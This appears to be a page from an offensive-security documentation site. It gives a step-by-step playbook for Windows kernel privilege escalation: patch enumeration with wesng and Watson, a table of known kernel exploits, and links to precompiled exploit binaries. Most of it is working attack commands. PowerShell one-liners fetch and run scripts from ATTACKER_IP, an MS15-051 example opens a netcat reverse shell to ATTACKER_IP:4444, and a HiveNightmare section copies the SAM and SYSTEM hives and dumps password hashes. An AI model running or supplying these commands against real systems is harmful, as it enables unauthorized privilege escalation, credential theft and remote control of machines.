> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Kernel Exploits

> Windows kernel exploitation: finding missing patches with Windows Exploit Suggester and common CVEs.

## Methodology

```
systeminfo → compare patches → find missing KB → search exploit → compile/download → execute
```

***

## Windows Exploit Suggester

### wesng (Recommended)

```bash theme={"dark"}
git clone https://github.com/bitsadmin/wesng.git
cd wesng
python3 wes.py --update
```

Save `systeminfo` output from victim:

```cmd theme={"dark"}
systeminfo > systeminfo.txt
```

Run:

```bash theme={"dark"}
python3 wes.py systeminfo.txt
```

Filter critical only:

```bash theme={"dark"}
python3 wes.py systeminfo.txt --impact "Elevation of Privilege"
```

### Watson (.NET — Run on Target)

```cmd theme={"dark"}
Watson.exe
```

Identifies missing KBs and suggests exploits. Requires .NET 4.5+.

### Sherlock (PowerShell — Deprecated but Works)

```powershell theme={"dark"}
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Sherlock.ps1'); Find-AllVulns
```

***

## Check Installed Patches

```cmd theme={"dark"}
wmic qfe
```

```powershell theme={"dark"}
Get-HotFix | Sort-Object InstalledOn -Descending
```

Compare against known exploit KBs.

***

## Common Kernel Exploits

### MS16-032 — Secondary Logon (Windows 7/8/10, Server 2008/2012)

```powershell theme={"dark"}
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/MS16-032.ps1'); Invoke-MS16032
```

Missing KB: `KB3139914`

***

### MS15-051 — Win32k (Windows 7, Server 2008)

```cmd theme={"dark"}
ms15-051.exe whoami
ms15-051.exe "cmd /c C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
```

Missing KB: `KB3045171`

***

### MS14-058 — TrackPopupMenu (Windows 7, Server 2008)

```cmd theme={"dark"}
ms14-058.exe
```

Missing KB: `KB3000061`

***

### CVE-2021-1675 / CVE-2021-34527 — PrintNightmare

See dedicated [PrintNightmare](/windows-privesc/printnightmare) page.

***

### CVE-2021-36934 — HiveNightmare / SeriousSAM

SAM/SYSTEM readable by non-admin due to shadow copy ACL.

Check:

```cmd theme={"dark"}
icacls C:\Windows\System32\config\SAM
```

If `BUILTIN\Users` has read access:

```cmd theme={"dark"}
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .
```

Extract:

```bash theme={"dark"}
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
```

***

### CVE-2023-28252 — CLFS Driver

Windows 10/11, Server 2022. CLFS kernel driver elevation.

```bash theme={"dark"}
# Check
https://github.com/fortra/CVE-2023-28252
```

***

## Pre-compiled Exploits

```bash theme={"dark"}
# SecWiki collection
https://github.com/SecWiki/windows-kernel-exploits

# Precompiled binaries
https://github.com/abatchy17/WindowsExploits
```

***

## Quick Reference

| CVE            | KB        | Affected                 | Year |
| -------------- | --------- | ------------------------ | ---- |
| MS08-067       | KB958644  | XP, Server 2003          | 2008 |
| MS14-058       | KB3000061 | 7, Server 2008           | 2014 |
| MS15-051       | KB3045171 | 7, Server 2008           | 2015 |
| MS16-032       | KB3139914 | 7/8/10, Server 2008/2012 | 2016 |
| CVE-2021-1675  | KB5003690 | 10/11, Server 2016-2022  | 2021 |
| CVE-2021-36934 | KB5004945 | 10 (1809+)               | 2021 |
| CVE-2023-28252 | KB5025221 | 10/11, Server 2022       | 2023 |
